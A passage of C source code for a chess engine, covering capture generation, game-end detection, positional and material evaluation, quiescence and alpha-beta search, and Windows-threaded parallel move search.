orderedNodes[i].move; // Reorder the legal moves into a sorted list\n\t}\n\n\treturn legalCount;\n}\n\n// ==== Let a list of legal captures ====\nint legalCaptures(Move * legalCaptures, Position * position, char color) {\n\tint i, captureCount = 0;\n\n\tMove moves[MAX_BRANCHING_FACTOR];\n\tint legalCount = legalMoves(moves, position, color); // Get the number of legal moves\n\n\tfor (i=0; i<legalCount; i++) {\n\t\tint arrivingSquare = getTo(moves[i]); // Get information for selected position\n\t\tif ( index2bb(arrivingSquare) & getColoredPieces(position->board, opponent(color)) ) {\n\t\t\tlegalCaptures[captureCount++] = moves[i]; // If the piece on the board is a valid piece to take (oposite colour) then increase the count of legal caputres by one\n\t\t}\n\t}\n\n\treturn captureCount;\n}\n\n// ====== GAME CONTROL =======\n\n// ==== Determines if it is checkmate ====\nBOOL isCheckmate(Position * position) {\n\t// if is in check and has no legal moves\n\tif (isCheck(position->board, position->toMove) && legalMovesCount(position, position->toMove) == 0)\n\t\treturn TRUE;\n\telse\n\t\treturn FALSE;\n}\n\n// ==== Determines if it is a stalemate ====\nBOOL isStalemate(Position * position) {\n\t// if no legal moves but not in check\n\tif (!isCheck(position->board, position->toMove) && legalMovesCount(position, position->toMove) == 0)\n\t\treturn TRUE;\n\telse\n\t\treturn FALSE;\n}\n\n// ==== Determines if there is insufficient material (neither player can checkmate) ====\nBOOL hasInsufficientMaterial(int board[]) {\n\tint pieceCount = countBits(getOccupiedSquares(board));\n\n\tif ( pieceCount <= 3 ) {\n\t\tif ( pieceCount == 2 || getKnights(board) != 0 || getBishops(board) != 0 )\n\t\t\treturn TRUE;\n\t}\n\n\treturn FALSE;\n}\n\n// ==== Determines if it is the endgame ====\nBOOL isEndgame(int board[]) {\n\tif (countBits(getOccupiedSquares(board)) <= ENDGAME_PIECE_COUNT)\n\t\treturn TRUE;\n\treturn FALSE;\n}\n\n// ==== Determines if the move limit has been reached ====\nBOOL isOver75MovesRule(Position * position) {\n\tif (position->halfmoveClock >= 150)\n\t\treturn TRUE;\n\telse\n\t\treturn FALSE;\n}\n\n// ==== Determines if the game has ended ====\nBOOL hasGameEnded(Position * position) {\n\t// checkmate, stalemate, insufficient material, or move limit reached\n\tif ( isCheckmate(position) ||\n\t\t isStalemate(position) ||\n\t\t hasInsufficientMaterial(position->board) ||\n\t\t isOver75MovesRule(position) )\n\t\treturn TRUE;\n\telse\n\t\treturn FALSE;\n}\n\n// ==== Prints the outcome of the game ====\nvoid printOutcome(Position * position) {\n\t// Black in checkmate\n\tif (isCheckmate(position) && position->toMove == BLACK)\n\t\tprintf(\"WHITE wins!\\n\");\n\t// White in checkmate\n\tif (isCheckmate(position) && position->toMove == WHITE)\n\t\tprintf(\"BLACK wins!\\n\");\n\t// Draw: Stalemate\n\tif (isStalemate(position))\n\t\tprintf(\"Draw by stalemate!\\n\");\n\t// Draw: Insufficient Material\n\tif (hasInsufficientMaterial(position->board))\n\t\tprintf(\"Draw by insufficient material!\\n\");\n\t// Draw: Move limit reached\n\tif ( isOver75MovesRule(position) )\n\t\tprintf(\"Draw by 75 move rule!\\n\");\n\tfflush(stdout);\n}\n\n// ========== EVAL ===========\n\n// ==== Returns the win score for specified color ====\nint winScore(char color) {\n\tif (color == WHITE)\n\t\treturn 10*PIECE_VALUES[KING];\n\tif (color == BLACK)\n\t\treturn -10*PIECE_VALUES[KING];\n\treturn 0;\n}\n\n// ==== Returns the material total for specified color ====\nint materialSum(int board[], char color) {\n\tint i, material = 0;\n\n\t// goes through board\n\tfor (i=0; i<NUM_SQUARES; i++) {\n\t\t// if space is occupied by a piece of specified color\n\t\tif (board[i] != EMPTY && (board[i]&COLOR_MASK) == color) {\n\t\t\t// add piece value to material\n\t\t\tmaterial += PIECE_VALUES[board[i]&PIECE_MASK];\n\t\t}\n\t}\n\n\treturn material;\n}\n\n// ==== Returns the difference of the colors' material sum ====\nint materialBalance(int board[]) {\n\treturn materialSum(board, WHITE) - materialSum(board, BLACK);\n}\n\n// ==== Returns positional bonus for specified color\nint positionalBonus(int board[], char color) {\n\tint bonus = 0;\n\n\tint i;\n\tfor (i=0; i<NUM_SQUARES; i++) {\n\t\tint piece = board[i];\n\n\t\t// if space is occupied by piece of specified color\n\t\tif (piece != EMPTY && (piece&COLOR_MASK) == color) {\n\t\t\tint pieceType = piece&PIECE_MASK;\n\n\t\t\t// Switch statement to handle each piece and their corresponding bonuses\n\t\t\tswitch(pieceType) {\n\t\t\tcase PAWN:\n\t\t\t\tif (color == WHITE) {\n\t\t\t\t\tbonus += PAWN_BONUS[i];\n\t\t\t\t} else {\n\t\t\t\t\tbonus += PAWN_BONUS[FLIP_VERTICAL[i]];\n\t\t\t\t}\n\n\t\t\t\tif (isDoubledPawn(index2bb(i), board)) {\n\t\t\t\t\tbonus -= DOUBLED_PAWN_PENALTY/2;\n\t\t\t\t}\n\t\t\t\tif (isPassedPawn(index2bb(i), board)) {\n\t\t\t\t\tbonus += PASSED_PAWN_BONUS;\n\t\t\t\t}\n\n\t\t\t\tif (isIsolatedPawn(index2bb(i), board)) {\n\t\t\t\t\tbonus -= ISOLATED_PAWN_PENALTY;\n\t\t\t\t} else if (isBackwardsPawn(index2bb(i), board)) {\n\t\t\t\t\tbonus -= BACKWARDS_PAWN_PENALTY;\n\t\t\t\t}\n\n\t\t\t\tbreak;\n\n\t\t\tcase KNIGHT:\n\t\t\t\tif (color == WHITE) {\n\t\t\t\t\tbonus += KNIGHT_BONUS[i];\n\t\t\t\t} else {\n\t\t\t\t\tbonus += KNIGHT_BONUS[FLIP_VERTICAL[i]];\n\t\t\t\t}\n\t\t\t\tbreak;\n\n\t\t\tcase BISHOP:\n\t\t\t\tif (color == WHITE) {\n\t\t\t\t\tbonus += BISHOP_BONUS[i];\n\t\t\t\t} else {\n\t\t\t\t\tbonus += BISHOP_BONUS[FLIP_VERTICAL[i]];\n\t\t\t\t}\n\t\t\t\tbreak;\n\n\t\t\tcase ROOK:\n \t\tif (isOpenFile(index2bb(i), board)) {\n \t\t\tbonus += ROOK_OPEN_FILE_BONUS;\n \t\t} else if (isSemiOpenFile(index2bb(i), board)) {\n \t\t\tbonus += ROOK_SEMI_OPEN_FILE_BONUS;\n \t\t}\n\n\t\t\t\tif (color == WHITE) {\n\t\t\t\t\tif (index2bb(i) & RANK_7) {\n\t\t\t\t\t\tbonus += ROOK_ON_SEVENTH_BONUS;\n\t\t\t\t\t}\n\t\t\t\t} else {\n\t\t\t\t\tif (index2bb(i) & RANK_2) {\n\t\t\t\t\t\tbonus += ROOK_ON_SEVENTH_BONUS;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tbreak;\n\n\t\t\tcase KING:\n\t\t\t\tif (isEndgame(board)) {\n\t\t\t\t\tif (color == WHITE) {\n\t\t\t\t\t\tbonus += KING_ENDGAME_BONUS[i];\n\t\t\t\t\t} else {\n\t\t\t\t\t\tbonus += KING_ENDGAME_BONUS[FLIP_VERTICAL[i]];\n\t\t\t\t\t}\n\t\t\t\t} else {\n\t\t\t\t\tif (color == WHITE) {\n\t\t\t\t\t\tbonus += KING_BONUS[i];\n\t\t\t\t\t} else {\n\t\t\t\t\t\tbonus += KING_BONUS[FLIP_VERTICAL[i]];\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\treturn bonus;\n}\n\n// ==== Returns the difference of each colors' positional bonus ====\nint positionalBalance(int board[]) {\n\treturn positionalBonus(board, WHITE) - positionalBonus(board, BLACK);\n}\n\n// ==== Returns the value of the position at the end of the game ==== \nint endNodeEvaluation(Position * position) {\n\t// If it is checkmate, return the winning score\n\tif (isCheckmate(position)) {\n\t\treturn winScore(opponent(position->toMove));\n\t}\n\t// If it is in stalemate or will likely be a stalemate, return 0\n\tif (isStalemate(position) || hasInsufficientMaterial(position->board) || isOver75MovesRule(position)) {\n\t\treturn 0;\n\t}\n\t// Else, return 0\n\treturn 0;\n}\n\n// ==== Returns the value of the current position ====\nint staticEvaluation(Position * position) {\n\t// If the game is over, end node evaluation\n\tif (hasGameEnded(position))\n\t\treturn endNodeEvaluation(position);\n\t// Else return a combination of the material and positional balances\n\t// to figure out who has the upper hand\n\telse\n\t\treturn materialBalance(position->board) + positionalBalance(position->board);\n}\n\n// ==== Returns count of moves that end in capture from position to target square ====\n// ==== Stores them in captures ====\nint getCaptureSequence(Move * captures, Position * position, int targetSquare) {\n\tMove allCaptures[MAX_BRANCHING_FACTOR], targetCaptures[MAX_ATTACKING_PIECES];\n\tint captureCount = legalCaptures(allCaptures, position, position->toMove);\t// Gets all legal captures from position\n\tint i, j, targetCount = 0;\n\n\t// For all legal captures\n\tfor (i=0; i<captureCount; i++) {\n\t\t// If the end position is the target square\n\t\tif ( getTo(allCaptures[i]) == targetSquare ) {\n\t\t\t// Add capture to target captures and increase target count\n\t\t\ttargetCaptures[targetCount++] = allCaptures[i];\n\t\t}\n\t}\n\n\tMove captureBuffer[targetCount];\n\n\t// Order the moves in order of increasing value\n\tBOOL sorted;\n\t// Insertion sort of targetCount\n\tfor (i=0; i<targetCount; i++) {\n\t\tsorted = FALSE;\n\t\t// Get integer representation of piece from targetcaptures[i]\n\t\tint piece = position->board[getFrom(targetCaptures[i])] & PIECE_MASK;\n\n\t\tfor (j=0; j<i; j++) {\n\t\t\t// Get integer representation of piece from captures[j]\n\t\t\tint sortedPiece = position->board[getFrom(captures[j])] & PIECE_MASK;\n\n\t\t\t// If the piece at target captures is less than the piece at captures\n\t\t\tif ( PIECE_VALUES[piece] < PIECE_VALUES[sortedPiece] ) {\n\t\t\t\t// Move captures[j] over 1 spot\n\t\t\t\tsorted = TRUE;\n\t\t\t\tmemcpy(captureBuffer, &captures[j], (i-j)*sizeof(Move));\n\t\t\t\tmemcpy(&captures[j+1], captureBuffer, (i-j)*sizeof(Move));\n\t\t\t\t// Move targetCaptures[i] to captures[j]\n\t\t\t\tcaptures[j] = targetCaptures[i];\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\n\t\t// Else, insert at end of iteration\n\t\tif ( sorted == FALSE ) {\n\t\t\tcaptures[i] = targetCaptures[i];\n\t\t}\n\t}\n\n\treturn targetCount;\n}\n\n// Evaluates the long-term cost of taking a piece\n// Used for deciding if a trade is bad in the long term\nint staticExchangeEvaluation(Position * position, int targetSquare) {\n\tMove captures[MAX_ATTACKING_PIECES];\n\t// Get sorted list of possible captures\n\tint attackCount = getCaptureSequence(captures, position, targetSquare);\n\tint value = 0;\n\n\t// If the amount of possible captures is greater than 0\n\tif ( attackCount > 0 ) {\n\t\tPosition newPosition;\n\t\t// Simulate move\n\t\tupdatePosition(&newPosition, position, captures[0]);\n\t\t// Get value of the captured piece\n\t\tint capturedPiece = position->board[targetSquare] & PIECE_MASK;\n\t\tint pieceValue = PIECE_VALUES[capturedPiece];\n\t\t// Get overall value by subtracting the capture evaluation of the updated position from the value of the capture\n\t\tvalue = pieceValue - staticExchangeEvaluation(&newPosition, targetSquare);\n\t}\n\n\treturn value>0?value:0;\n}\n\n// More extensive value evaluation, done by checking all possible captures after a move\n// and seeing if any of the captures will cause the move to be a poor trade\nint quiescenceEvaluation(Position * position) {\n\t// Evaluate current position's value statically\n\tint staticScore = staticEvaluation(position);\n\n\t// If the game is over in this position, return the current score\n\tif (hasGameEnded(position))\n\t\treturn staticScore;\n\n\t// Get number of possible captures, and fill captures with all possible captures\n\tMove captures[MAX_BRANCHING_FACTOR];\n\tint captureCount = legalCaptures(captures, position, position->toMove);\n\n\t// If there are no possible captures, return the static score\n\tif (captureCount == 0) {\n\t\treturn staticScore;\n\t} else {\n\t\tPosition newPosition;\n\t\tint i, bestScore = staticScore;\n\n\t\tfor (i=0; i<captureCount; i++) {\n\t\t\t// If the current position is a poor exchange, break the loop\n\t\t\tif (staticExchangeEvaluation(position, getTo(captures[i])) <= 0)\n\t\t\t\tbreak;\n\n\t\t\t// Simulate capture\n\t\t\tupdatePosition(&newPosition, position, captures[i]);\n\t\t\t// Recursively calculate value of this position\n\t\t\tint score = quiescenceEvaluation(&newPosition);\n\n\t\t\t// If score is better than the current best, update the best score\n\t\t\tif ( (position->toMove == WHITE && score > bestScore) ||\n\t\t\t\t (position->toMove == BLACK && score < bestScore) ) {\n\t\t\t\tbestScore = score;\n\t\t\t}\n\t\t}\n\n\t\treturn bestScore;\n\t}\n}\n\n// ==============================================================\n// \t\t\t\t\t========= SEARCH ==========\n// ==============================================================\n\n// ==== Perfroms a static search ====\nNode staticSearch(Position * position) {\n\t// Initialize best score to max values before iteration\n\tint bestScore = position->toMove==WHITE?INT32_MIN:INT32_MAX;\n\tMove bestMove = 0;\n\n\t// Create array of possible moves\n\tMove moves[MAX_BRANCHING_FACTOR];\n\t// Finds the count of possible moves and fills move array with all possible moves\n\tint moveCount = legalMoves(moves, position, position->toMove);\n\n\tPosition newPosition;\n\tint i;\n\t//For all possible moves\n\tfor (i=0; i<moveCount; i++) {\n\t\t// Simulate move\n\t\tupdatePosition(&newPosition, position, moves[i]);\n\t\t// Calculate the value of the board after the move\n\t\tint score = staticEvaluation(&newPosition);\n\n\t\t// If move wins the game, return the move\n\t\tif (score == winScore(position->toMove)) {\n\t\t\treturn (Node) { .move = moves[i], .score = score };\n\t\t}\n\n\t\t//Otherwise, if the move is the best move so far, update the best move\n\t\tif ( (position->toMove == WHITE && score > bestScore) ||\n\t\t\t (position->toMove == BLACK && score < bestScore) ) {\n\t\t\tbestScore = score;\n\t\t\tbestMove = moves[i];\n\t\t}\n\t}\n\n\treturn (Node) { .move = bestMove, .score = bestScore };\n}\n\n// Search utilizing the quiescence evaluation to get a more accurate value estimate\nNode quiescenceSearch(Position * position) {\n\t// Initialize best score to max values before iteration\n\tint bestScore = position->toMove==WHITE?INT32_MIN:INT32_MAX;\n\tMove bestMove = 0;\n\n\tMove moves[MAX_BRANCHING_FACTOR];\n\tint moveCount = legalMoves(moves, position, position->toMove);\t// Gets legal moves\n\n\tPosition newPosition;\n\tint i;\n\t// Create array of possible moves\n\tfor (i=0; i<moveCount; i++) {\n\t\t// Simulate move\n\t\tupdatePosition(&newPosition, position, moves[i]);\n\t\t// Calculate the value of the board after the move, checking to see\n\t\t// if the value will be invalidated by an opponents move\n\t\tint score = quiescenceEvaluation(&newPosition);\n\n\t\t// If move wins the game, return the move\n\t\tif (score == winScore(position->toMove)) {\n\t\t\treturn (Node) { .move = moves[i], .score = score };\n\t\t}\n\n\t\t//Otherwise, if the move is the best move so far, update the best move\n\t\tif ( (position->toMove == WHITE && score > bestScore) ||\n\t\t\t (position->toMove == BLACK && score < bestScore) ) {\n\t\t\tbestScore = score;\n\t\t\tbestMove = moves[i];\n\t\t}\n\t}\n\n\treturn (Node) { .move = bestMove, .score = bestScore };\n}\n\n// Basic recursive search, which evaluates each position recursively up to a given depth\nNode alphaBeta(Position * position, char depth, int alpha, int beta) {\n\t// If the game has ended after this move, return\n\tif (hasGameEnded(position))\n\t\treturn (Node) { .score = endNodeEvaluation(position) };\n\n\t// If the depth has reached 1, then return the static evaluation of the position\n\t// As static evaluation is naturally an evaluation of depth 1\n\tif (depth == 1)\n\t\treturn staticSearch(position);\n\n\t// Shortcut check to see if a simple 1-depth search will yield a winning move\n\tNode staticNode = staticSearch(position);\n\tif (staticNode.score == winScore(position->toMove))\n\t\treturn staticNode;\n\t// Otherwise, proceed with the recursive search\n\n\tMove bestMove = 0;\n\n\t// Find list of possible moves, ordered by the move's value\n\tMove moves[MAX_BRANCHING_FACTOR];\n\tint moveCount = staticOrderLegalMoves(moves, position, position->toMove);\n\n\tPosition newPosition;\n\tint i;\n\t// For all possible moves\n\tfor (i=0; i<moveCount; i++) {\n\t\t// Simulate move\n\t\tupdatePosition(&newPosition, position, moves[i]);\n\n\t\t// Evaluate node's score recursively \n\t\t// (Makes move, then simulates making more moves after that move, and returns best score)\n\t\tint score = alphaBeta(&newPosition, depth-1, alpha, beta).score;\n\n\t\t// If the returned score wins the game, return that node\t\n\t\tif (score == winScore(position->toMove)) {\n\t\t\treturn (Node) { .move = moves[i], .score = score };\n\t\t}\n\n\t\t// Otherwise, update the best move and upper/lower bound (alpha/beta)\n\t\tif (position->toMove == WHITE && score > alpha) {\n\t\t\talpha = score;\n\t\t\tbestMove = moves[i];\n\t\t} else if (position->toMove == BLACK && score < beta) {\n\t\t\tbeta = score;\n\t\t\tbestMove = moves[i];\n\t\t}\n\t\t// If the lower bound exceeds the upper bound, terminate the loop\n\t\tif (alpha > beta) {\n\t\t\tbreak;\n\t\t}\n\t}\n\n\treturn (Node) { .move = bestMove, .score = position->toMove==WHITE?alpha:beta };\n}\n\n// Generates sorted list of best possible moves for a certain position using alphaBeta\nint alphaBetaNodes(Node * sortedNodes, Position * position, char depth) {\n\tNode nodes[MAX_BRANCHING_FACTOR];\n\tMove moves[MAX_BRANCHING_FACTOR];\n\t// Get list of legal moves\n\tint moveCount = legalMoves(moves, position, position->toMove);\n\n\tPosition newPosition;\n\tint i;\n\t// For all possible moves\n\tfor (i=0; i<moveCount; i++) {\n\t\t// Simulate move\n\t\tupdatePosition(&newPosition, position, moves[i]);\n\t\t\n\t\t// Add move to list of nodes\n\t\tnodes[i].move = moves[i];\n\t\t// Use alphaBeta to calculate the score of the move, and add to list of nodes\n\t\tnodes[i].score = depth>1?alphaBeta(&newPosition, depth-1, INT32_MIN, INT32_MAX).score:staticEvaluation(&newPosition);\n\t}\n\n\t// Sort list of nodes into sortedNodes\n\tsortNodes(sortedNodes, nodes, moveCount, position->toMove);\n\n\treturn moveCount;\n}\n\n// A version of alphaBeta that uses a list of nodes sorted by value using alphaBeta (why?)\n// It also uses quiescence search to confirm the validity of the move\nNode iterativeDeepeningAlphaBeta(Position * position, char depth, int alpha, int beta, BOOL verbose) {\n\t// If the game has ended after this move, return\n\tif (hasGameEnded(position))\n\t\treturn (Node) { .score = endNodeEvaluation(position) };\n\n\t// If the depth has reached 1, then return the quiescence evaluation of the position\n\tif (depth == 1)\n\t\treturn quiescenceSearch(position);\n//\t\treturn staticSearch(position);\n\n\t// Shortcut check to see if a simple 1-depth search will yield a winning move\n\tNode staticNode = staticSearch(position);\n\tif (staticNode.score == winScore(position->toMove))\n\t\treturn staticNode;\n\t// Otherwise, proceed with the recursive search\n\n\tMove bestMove = 0;\n\n\tif (verbose) {\n\t\tprintf(\"Ordering moves...\\n\");\n\t\tfflush(stdout);\n\t}\n\n\t// Find list of possible moves, ordered by the move's value using alphaBeta to calculate the score\n\tNode nodes[MAX_BRANCHING_FACTOR];\n\tint moveCount = alphaBetaNodes(nodes, position, depth-1);\n\n\tPosition newPosition;\n\tint i;\n\t// For all possible moves\n\tfor (i=0; i<moveCount; i++) {\n\t\t// Simulate move\n\t\tupdatePosition(&newPosition, position, nodes[i].move);\n\n\t\tif (verbose) {\n\t\t\tprintf(\"(Move %2d/%d) \", i+1, moveCount);\n\t\t\tprintFullMove(nodes[i].move, position->board);\n\t\t\tprintf(\" = \");\n\t\t\tfflush(stdout);\n\t\t}\n\t\t// Evaluate node's score recursively \n\t\t// (Makes move, then simulates making more moves after that move, and returns best score)\n\t\tint score = iterativeDeepeningAlphaBeta(&newPosition, depth-1, alpha, beta, FALSE).score;\n\n\t\tif (verbose) {\n\t\t\tprintf(\"%.2f\\n\", score/100.0);\n\t\t\tfflush(stdout);\n\t\t}\n\n\t\t// If the returned score wins the game, return that node\n\t\tif (score == winScore(position->toMove)) {\n\t\t\treturn (Node) { .move = nodes[i].move, .score = score };\n\t\t}\n\n\t\t// Otherwise, update the best move and upper/lower bound (alpha/beta)\n\t\tif (position->toMove == WHITE && score > alpha) {\n\t\t\talpha = score;\n\t\t\tbestMove = nodes[i].move;\n\t\t} else if (position->toMove == BLACK && score < beta) {\n\t\t\tbeta = score;\n\t\t\tbestMove = nodes[i].move;\n\t\t}\n\n\t\t// If the lower bound exceeds the upper bound, terminate the loop\n\t\tif (alpha > beta) {\n\t\t\tbreak;\n\t\t}\n\t}\n\n\treturn (Node) { .move = bestMove, .score = position->toMove==WHITE?alpha:beta };\n}\n\n// A version of iterativeDeepeningAlphaBeta with static upper and lower bounds\n// Used for limiting the number of iterations when evaluating all possible moves\n// by restricting the upper and lower bounds to the current bestupper and lower bounds\n// (used when threading)\nNode pIDAB(Position * position, char depth, int * p_alpha, int * p_beta) {\n\t// If the game has ended after this move, return\n\tif (hasGameEnded(position))\n\t\treturn (Node) { .score = endNodeEvaluation(position) };\n\n\t// If the depth has reached 1, then return the quiescence evaluation of the position\n\tif (depth == 1)\n\t\treturn quiescenceSearch(position);\n\n\t// Shortcut check to see if a simple 1-depth search will yield a winning move\n\tNode staticNode = staticSearch(position);\n\tif (staticNode.score == winScore(position->toMove))\n\t\treturn staticNode;\n\t// Otherwise, proceed with the recursive search\n\n\tMove bestMove = 0;\n\n\t// Find list of possible moves, ordered by the move's value using alphaBeta to calculate the score\n\tNode nodes[MAX_BRANCHING_FACTOR];\n\tint moveCount = alphaBetaNodes(nodes, position, depth-1);\n\n\tPosition newPosition;\n\tint i;\n\tint alpha = *p_alpha;\n\tint beta = *p_beta;\n\t// For all possible moves\n\tfor (i=0; i<moveCount; i++) {\n\t\t// Simulate move\n\t\tupdatePosition(&newPosition, position, nodes[i].move);\n\n\t\t// Evaluate node's score recursively \n\t\t// (Makes move, then simulates making more moves after that move, and returns best score)\n\t\tint score = iterativeDeepeningAlphaBeta(&newPosition, depth-1, alpha, beta, FALSE).score;\n\n\t\t// If the returned score wins the game, return that node\n\t\tif (score == winScore(position->toMove)) {\n\t\t\treturn (Node) { .move = nodes[i].move, .score = score };\n\t\t}\n\n\t\t// Otherwise, update the best move and upper/lower bound (alpha/beta)\n\t\tif (position->toMove == WHITE && score > alpha) {\n\t\t\talpha = score;\n\t\t\tbestMove = nodes[i].move;\n\t\t} else if (position->toMove == BLACK && score < beta) {\n\t\t\tbeta = score;\n\t\t\tbestMove = nodes[i].move;\n\t\t}\n\n\t\t// If the lower bounds exceed any of the upper bounds, terminate the loop\n\t\tif (alpha > beta || alpha > *p_beta || *p_alpha > beta) {\n\t\t\tbreak;\n\t\t}\n\t}\n\n\treturn (Node) { .move = bestMove, .score = position->toMove==WHITE?alpha:beta };\n\n}\n\n// A version of pIDAB that writes the search data to a hash file\nNode pIDABhashed(Position * position, char depth, int * p_alpha, int * p_beta) {\n\t// If the game has ended after this move, return\n\tif (hasGameEnded(position)) {\n\t\tint score = endNodeEvaluation(position);\n\t\twriteToHashFile(position, score, 0);\n\t\treturn (Node) { .score = score };\n\t}\n\n\t// If the depth has reached 1, then return the quiescence evaluation of the position\n\tif (depth <= 1) {\n\t\tNode quie = quiescenceSearch(position);\n\t\twriteToHashFile(position, quie.score, depth);\n\t\treturn quie;\n\t}\n\n\t// Shortcut check to see if a simple 1-depth search will yield a winning move\n\tNode staticNode = staticSearch(position);\n\tif (staticNode.score == winScore(position->toMove)) {\n\t\twriteToHashFile(position, staticNode.score, 1);\n\t\treturn staticNode;\n\t}\n\t// Otherwise, proceed with the recursive search\n\n\tMove bestMove = 0;\n\n\tNode nodes[MAX_BRANCHING_FACTOR];\n\tint moveCount = alphaBetaNodes(nodes, position, depth-1);\n\t// Find list of possible moves, ordered by the move's value using alphaBeta to calculate the score\n\n\tPosition newPosition;\n\tint i;\n\tint alpha = *p_alpha;\n\tint beta = *p_beta;\n\t// For all possible moves\n\tfor (i=0; i<moveCount; i++) {\n\t\t// Simulate move\n\t\tupdatePosition(&newPosition, position, nodes[i].move);\n\n\t\t// Evaluate node's score recursively \n\t\t// (Makes move, then simulates making more moves after that move, and returns best score)\n\t\tint score = iterativeDeepeningAlphaBeta(&newPosition, depth-1, alpha, beta, FALSE).score;\n\t\twriteToHashFile(&newPosition, score, depth-1);\n\n\t\t// If the returned score wins the game, return that node\n\t\tif (score == winScore(position->toMove)) {\n\t\t\treturn (Node) { .move = nodes[i].move, .score = score };\n\t\t}\n\n\t\t// Otherwise, update the best move and upper/lower bound (alpha/beta)\n\t\tif (position->toMove == WHITE && score > alpha) {\n\t\t\talpha = score;\n\t\t\tbestMove = nodes[i].move;\n\t\t} else if (position->toMove == BLACK && score < beta) {\n\t\t\tbeta = score;\n\t\t\tbestMove = nodes[i].move;\n\t\t}\n\n\t\t// If the lower bounds exceed any of the upper bounds, terminate the loop\n\t\tif (alpha > beta || alpha > *p_beta || *p_alpha > beta) {\n\t\t\tbreak;\n\t\t}\n\t}\n\n\twriteToHashFile(position, position->toMove==WHITE?alpha:beta, depth);\n\treturn (Node) { .move = bestMove, .score = position->toMove==WHITE?alpha:beta };\n}\n\n\n// Parallel processing currently only implemented for Windows\n// ifdef block to define windows-only features\n#ifdef _WIN32\n\n// Threaded position evaluation function for windows\nDWORD WINAPI evaluatePositionThreadFunction(LPVOID lpParam) {\n\t// Get thread info\n\tThreadInfo * tInfo = (ThreadInfo *) lpParam;\n\t// Get position to evaluate from the thread info\n\tPosition * pos = &tInfo->pos;\n\n\t// Evalute the value of the node using pIDAB\n\tNode node = pIDAB(pos, tInfo->depth, tInfo->alpha, tInfo->beta);\n\n\t// If the new node score is better than the old node score\n\t// Update the global upper and lower bounds accordingly\n\tif ( pos->toMove == BLACK && node.score > *tInfo->alpha ) {\n\t\t*tInfo->alpha = node.score;\n\t} else if ( pos->toMove == WHITE && node.score < *tInfo->beta ) {\n\t\t*tInfo->beta = node.score;\n\t}\n\n\tif (tInfo->verbose) {\n\t\tprintf(\"-\");\n\t\tfflush(stdout);\n\t}\n\n\t// Return the score of the node\n\treturn node.score;\n}\n\n// Threaded position evaluation function that calls pIDABhashed instead of pIDAB\nDWORD WINAPI evaluatePositionThreadFunctionHashed(LPVOID lpParam) {\n\t// Get thread info\n\tThreadInfo * tInfo = (ThreadInfo *) lpParam;\n\t// Get position to evaluate from the thread info\n\tPosition * pos = &tInfo->pos;\n\n\t// Evalute the value of the node using pIDABhashed\n\tNode node = pIDABhashed(pos, tInfo->depth, tInfo->alpha, tInfo->beta);\n\n\t// If the new node score is better than the old node score\n\t// Update the global upper and lower bounds accordingly\n\tif ( pos->toMove == BLACK && node.score > *tInfo->alpha ) {\n\t\t*tInfo->alpha = node.score;\n\t} else if ( pos->toMove == WHITE && node.score < *tInfo->beta ) {\n\t\t*tInfo->beta = node.score;\n\t}\n\n\tif (tInfo->verbose) {\n\t\tprintf(\"-\");\n\t\tfflush(stdout);\n\t}\n\n\t// Return the score of the node\n\treturn node.score;\n}\n\n// Function which initiates threaded move search\nNode idabThreaded(Position * position, int depth, BOOL verbose) {\n\t// If the game has ended after this move, return\n\tif (hasGameEnded(position))\n\t\treturn (Node) { .score = endNodeEvaluation(position) };\n\n\t// If the depth has reached 1, then return the quiescence evaluation of the position\n\tif (depth <= 1)\n\t\treturn quiescenceSearch(position);\n\n\tint i;\n\tNode nodes[MAX_BRANCHING_FACTOR];\n\t// Find list of possible moves, ordered by the move's value using alphaBeta to calculate the score\n\tint moveCount = alphaBetaNodes(nodes, position, depth-1);\n\n\t// If there is only 1 possible move, return that move\n\tif (moveCount == 1) {\n\t\treturn nodes[0];\n\t}\n\n\tif (verbose) {\n\t\tprintf(\"Analyzing %d possible moves with base depth %d:\\n[\", moveCount, depth);\n\t\tfor (i=0; i<moveCount; i++)\n\t\t\tprintf(\" \");\n\t\tprintf(\"]\\r[\");\n\t\tfflush(stdout);\n\t}\n\n\tHANDLE threadHandles[MAX_BRANCHING_FACTOR];\n\tThreadInfo threadInfo[MAX_BRANCHING_FACTOR];\n\t// Initialize upper and lower bounds to maximum values\n\tint alpha = INT32_MIN;\n\tint beta = INT32_MAX;\n\n\t// For all possible moves\n\tfor (i=0; i<moveCount; i++) {\n\t\t// Initiallize thread struct \n\t\tthreadInfo[i].depth = depth-1;\n\t\tupdatePosition(&threadInfo[i].pos, position, nodes[i].move);\n\t\tthreadInfo[i].alpha = &alpha;\n\t\tthreadInfo[i].beta = &beta;\n\t\tthreadInfo[i].verbose = verbose;\n\n\t\t// Start threaded evaluation of the current move\n\t\tthreadHandles[i] = CreateThread(NULL, 0, evaluatePositionThreadFunction, (LPVOID) &threadInfo[i], 0, NULL);\n\n\t\t// If the thread failed to create, print an error message\n\t\tif ( threadHandles[i] == NULL ) {\n//\t\t\tprintf(\"Error launching process on move #%d!\\n\", i);\n\t\t\tprintf(\"!\");\n\t\t\tfflush(stdout);\n\t\t}\n\t}\n\n\t// Wait for threads to finish (windows command)\n\tWaitForMultipleObjects((DWORD) moveCount, threadHandles, TRUE, INFINITE);\n\tif (verbose) {\n\t\tprintf(\"]\\n\");\n\t\tfflush(stdout);\n\t}\n\n\t// Retrieve best move\n\n\tMove bestMove = 0;\n\tint bestMoveScore = position->toMove==WHITE?INT32_MIN:INT32_MAX;\n\tlong unsigned int retVal;\n\tint score;\n\t// For all of the possible moves\n\tfor (i=0; i<moveCount; i++) {\n\t\t// Retrieve the exit value of the thread, which is the score of the position\n\t\tGetExitCodeThread(threadHandles[i], &retVal);\n\t\tscore = (int) retVal;\n\n\t\t// If the score is better than the current best score, update the best move and best score\n\t\tif ( (position->toMove == WHITE && score > bestMoveScore) || (position->toMove == BLACK && score < bestMoveScore) ) {\n\t\t\tbestMove = nodes[i].move;\n\t\t\tbestMoveScore = score;\n\t\t}\n\n\t\t// Deallocate thread\n\t\tif (CloseHandle(threadHandles[i]) == 0) {\n//\t\t\tprintf(\"Error on closing thread #%d!\\n\", i);\n\t\t\tprintf(\"x\");\n\t\t\tfflush(stdout);\n\t\t}\n\t}\n\n\treturn (Node) { .move = bestMove, .score = bestMoveScore };\n}\n\n// Function which initiates threaded move search with initial upper and lower bounds\n// Evaluates value of first position before performing threading, and restricts\n// the upper and lower bounds of the threads to the upper and lower bounds of the\n// first position\nNode idabThreadedBestFirst(Position * position, int depth, BOOL 